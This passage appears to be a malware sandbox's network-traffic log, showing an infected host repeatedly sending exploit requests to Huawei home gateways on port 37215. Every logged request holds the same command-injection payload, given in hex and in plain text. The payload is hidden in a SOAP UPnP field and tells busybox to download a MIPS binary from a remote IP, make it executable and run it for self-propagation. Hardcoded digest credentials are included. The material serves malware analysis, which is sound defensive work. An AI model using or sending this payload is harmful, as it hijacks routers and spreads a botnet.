6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1559192.168.2.1359302178.106.58.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502876997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1560192.168.2.133344641.187.96.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502887011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1561192.168.2.134036689.104.13.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502929926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1562192.168.2.1347352102.178.203.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502948999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1563192.168.2.134364641.255.223.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502995968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1564192.168.2.1353272197.228.157.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503005981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1565192.168.2.1358804197.158.76.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503140926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1566192.168.2.133686641.9.209.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503237963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1567192.168.2.135756641.163.64.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503277063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1568192.168.2.1357512198.75.138.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503304958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1569192.168.2.1334306197.164.148.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.503354073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
